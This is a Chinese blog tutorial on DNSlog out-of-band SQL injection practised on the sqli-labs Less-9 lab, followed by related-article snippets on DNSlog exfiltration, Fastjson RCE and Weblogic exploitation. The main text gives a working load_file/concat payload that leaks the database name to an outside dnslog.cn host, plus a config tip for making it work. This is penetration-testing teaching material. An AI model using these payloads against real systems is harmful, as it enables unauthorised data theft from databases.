DNSlog回显

最新推荐文章于 2024-05-12 11:46:14 发布
最新推荐文章于 2024-05-12 11:46:14 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 网络安全 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/127256145
版权
本文介绍了一种利用DNSlog实现SQL注入回显的方法,通过构造特定的load_file语句,让服务器尝试访问DNSlog提供的随机地址,从而在DNSlog平台上记录下数据库名称等信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

跟报错注入有异曲同工之处

报错注入是从返回的错误报告中获取得到的数据,而DNSlog是记录查询的记录获取信息。

http://127.0.0.1:88/Less-9/?id=1’ and (select load_file (concat(‘\\’,(select database()),‘.4dxa8g.dnslog.cn\xxx.txt’)))–+

报错利用是updatexml函数,而DNSlog是用的loadfile函数

那么有意思的来了,loadfile会会去网上读取文件。

我们不妨翻译一下下面的语句

concat('\\\\',(select database()),'.4dxa8g.dnslog.cn\\xxx.txt'))

concat是拼接函数,主要的是database()这个函数,会返回当前表的名称,我们加上Hello为当前表的名称.

后面的网址是DNSlog随机网址,一会实践将会更换.

最后的xxx.txt则是文件的名称,不用管有没有,就是意思一下

有两个\就会被转义为单个\

那么这句话会被转义为

\\hello.4dxa8g.dnslog.cn\xxx.txt

我们先来个简单的实践,看看DNSlog是否真的记得住

我们先去(www.dnslog.cn)去得到一个域名

然后我们把上面得到的语言改一下

\\hello.om7svv.dnslog.cn\xxx.txt

好了,打开浏览器试一下

没有文件,很正常

返回DNSlog看一下

好了,让我们进入实战

本教程基于Less-9实践(在虚拟机上试一下,在云服务器上似乎会被哪里给挡住了)

先去DNSlog获得域名

再将上面的语句中的域名改为得到的域名

?id=1’ and (select load_file (concat(‘\\’,(select database()),‘.要改的域名,前面的点必须保留\xxx.txt’)))–+

运行返回DNSlog查得到的结果

这便是DNSlog回显的方式了


我们在什么情况下使用回显呢?

  1. 在用时间盲注和布尔盲注时,达到一定限制封锁ip的情况(比方说sqlmap进行,然后封锁ip)
  2. 懒得用时间盲注和布尔盲注

如果没有正常回显结果,那么就有可能是权限不足,需要在my.ini中加入一下语句

secure_file_priv=“”

复现Fastjson反序列化漏洞(从dnslog到rce再到反弹shell)
记录并分享学习安全的知识点..
07-11 2286
Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。......
26-5 SQL 注入攻击 - 利用dnslog信息范例
weixin_43263566的博客
03-14 367
因此,这个 payload 的目的是利用 SQL 注入漏洞,尝试加载指定路径下的文件内容,并将结果返给攻击者。这个 payload 旨在利用盲注漏洞来执行 SQL 查询,通过。目标:使用 DVWA 的盲注作为靶机,获取数据库信息。函数加载数据库中的内容,并将结果返给攻击者。
利用DNSlogWeblogic(CVE-2017-10271) 漏洞执行命令结果
dfdhxb995397的博客
12-28 960
作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不咋办呢!让他返执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用! 符号:` `名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将...
DNSlog注入(利用DNSlog平台将SQL盲注变成注入)
柠檬i的博客
08-07 1764
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
渗透测试 机制平台 dnslog 搭建
whatday的专栏
08-07 2596
目录 1 前言 2 前期准备 3 实验过程 3.1 添加DNS解析 3.2 对外开放53端口 3.3 DNSLOG代码 4 WEB界面 5 后记 1 前言 DNSLOG是一种机制,常用于在某些漏洞无法但可以发起DNS请求的情况下,利用此方式外带数据,以解决某些漏洞由于无而难以利用的问题。主要利用场景有SQL盲注、无的命令执行、无的SSRF。本文介绍一种搭建DNSLOG平台的方法,旨在为渗透测试提供一些帮助。 2 前期准备 一个域名...
写bat脚本双击执行
qq_35911118的博客
04-08 3151
@echo off           不示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
利用DNS协议数据
hl1293348082的专栏
03-28 564
这个问题已经是去年提出的了,之前也看到过,在 CTF 题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。 这里对原理进行一波总结,并利用了 CEYE 平台 http://ceye.io/ 成功的进行了原理复现利用。 原理分析 这个虽然是利用到了比如说 mysql 的 LOAD_FILE 函数,其实本质还是对 windows 的资源管理器的一个利用,利用协议 // 去进行一个子域名的 DNS 解析,将你需要的(你取得的一些有用信息当做子域名信息给传递出来) 先了解下
Fastjson漏洞的识别与DNSlog
tpaer的博客
09-02 5521
Fastjson RCE漏洞实战POC探测方式
SQL注入篇——dns注入
爱国小白帽
02-10 2067
dns注入的使用场景 当目标无示位也无错误时便可使用此方法 1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址 2、将获取到的地址复制填入SQL语句中执行 注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可 注入语句: id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...
利用 DNSLog注入
故事讲予风听
07-18 873
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
dns_log进行sql注入
THMAIL的博客
10-16 425
以http://59.63.200.79:8022/cat/index.php?id=1为例, 以下语句中单引号有问题,为中文,大家自己修正下: 查询所有数据库名:(以下为步骤,自己理解并写注入sql) 1.select distinct TABLE_SCHEMAfrom information_schema.TABLES //从information_schema库的TABLES表中获取所有的数据库名; 2.可以使用limit每次一个数据库名,比如limit 0,1第一个数据库名...
通过sqli-labs-master第八关完成dns带外攻击
快递小哥的博客
01-09 684
1.利用dns缓存原理找到数据(dnslog平台查询) 2.在mysql里面获取想要的参数(load_file() 读取文件函数 version() 版本信息函数)concat() 多列合并到一起 1.txt是文件名(可以新创一个,主要是让函数生效) ,可以把一整个理解成是localhost\\1.txt,前面是网站路径,是在这个路径里面拿文件,这样版本号就出来了 ...
DNSlog注入及其原理
sweelg的博客
07-18 642
原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 具体使用详情参考: https://blog.csdn.net/qq_35569814/article/details/100348097 https://www.cnblogs.com/a.
【老火柴擦出新火花】利用DNSlog进行更高效率的无渗透测试
jklbnm12的博客
07-17 2304
目录0.说在前面0.1.DNSlog工具1.什么是DNSlog2.DNSlog原理3.DNSlog通常用在哪些地方3.1.SQL注入盲注3.2.XSS盲打3.3.无的命令执行3.4.无的SSRF3.5.无的XXE(Blind XXE) 0.说在前面 0.1.DNSlog工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog 另外我们也可以使用在线平台: http://
DNSlog介绍
热门推荐
告白的博客
07-09 2万+
0x00 DNSlog 介绍 首先我们知道DNS是起ip与域名的解析的服务,通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息,它记录着你对域名或者IP的访问信息,也就是类似于日志文件, 0x01 DNSlog原理 首先了解一下多级域名的概念,我们知道因特网采用树状结构命名方法,按组织结构划分域是一个名字空间中一个被管理的划分,域可划分为子域,子域再可被划分为多级域名称为一级域名,二级域名,三级域名,从一个域名地址来从右到左依次是顶级域名,二级域名,三级域名,例如 gao
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗
2401_84973011的博客
05-12 1399
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
检测命令注入时没有
小白渣的博客
03-01 4187
命令执行判断 命令执行可能会存在命令执行完没有,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无 有延时无 通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
合理利用DNSLOG进行无安全测试
weixin_34220963的博客
01-02 2808
在实际测试一些网站的安全性问题的时候,有些测试命令执行后是无的,我们可以写脚本来进行盲注,但有些网站会封禁掉我们的ip地址,这样我们可以通过设置ip代理池解决,但是遇到盲注往往效率很低,所以产生了DNSlog注入。 在使用dnslog之前我们需要先了解一下反引号符号:符号:`名称:反引号,上分隔符位置:反引号,这个字符一般在键盘的左上角,数字1的左边,不要将其同单引号混淆作用:反引号括起来的字...
Dnslog外带检测dns
最新发布
03-08
### Dnslog 外带检测与 DNS 技术原理 #### DNSLog 外带检测的技术原理 DNSLog 外带是一种利用 DNS 协议特性绕过网络边界限制的方法。当攻击者成功注入特定的有效载荷到目标应用程序中时,该有效载荷会触发一个外部的 DNS 请求。这个请求通常会被发送至由攻击者控制的 DNS 服务器上,在那里它可以被记录下来并用于推断内部系统的状态或数据[^1]。 为了实现有效的 DNSLog 外带检测,安全团队可以采取多种策略: - **监控异常流量模式**:通过设置基线来识别正常业务操作中的典型行为,并标记任何偏离这些标准的行为作为潜在威胁。 - **实时日志分析**:部署专门的日志管理系统(SIEM),能够快速处理大量来自不同源的数据流,并应用机器学习算法自动发现可疑活动。 - **黑名单/白名单管理**:维护已知恶意 IP 地址列表以及可信资源库,以便及时阻止非法连接尝试;同时允许合法通信不受干扰地继续进行。 ```python import logging from datetime import timedelta def monitor_dns_requests(logs, threshold=50): """Monitor and alert on unusual number of DNS requests.""" recent_logs = logs.filter(timestamp__gte=datetime.now()-timedelta(hours=1)) request_count = recent_logs.count() if request_count > threshold: logging.warning(f"Unusual activity detected: {request_count} DNS requests in the last hour.") ``` #### DNS 的工作机制 DNS 是指一种特殊的 DNS 查询方式,其中客户端发出带有自定义子域部分的查询字符串给指定名称服务器。如果配置得当,则每次这样的查询都会导致相应的响应消息返给原始发起方。这种方法常用来验证某些功能是否按预期工作,或是作为一种简单的调试工具[^4]。 具体来说,对于 Web 应用程序而言,可以通过构造特殊 URL 来触发展示页面加载过程中产生的错误信息或其他敏感细节。例如,`http://victim.com/?debug=true&domain=<attacker-controlled-subdomain>.example.com` 可能会导致浏览器向 `<attacker-controlled-subdomain>.example.com` 发送一次 A 记录查找请求,从而暴露出有关受害者环境的信息。 #### 实现方法概述 要防范上述提到的风险,建议采用以下措施加强防护力度: - 对于所有进出组织内外部网络边界的 DNS 流量实施严格过滤; - 定期审查现有的防火墙规则集以确保其有效性; - 使用最新的入侵防御系统 (IPS) 和防病毒软件保护关键资产免受最新形式的攻击; - 教育员工提高网络安全意识,减少人为失误带来的安全隐患。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值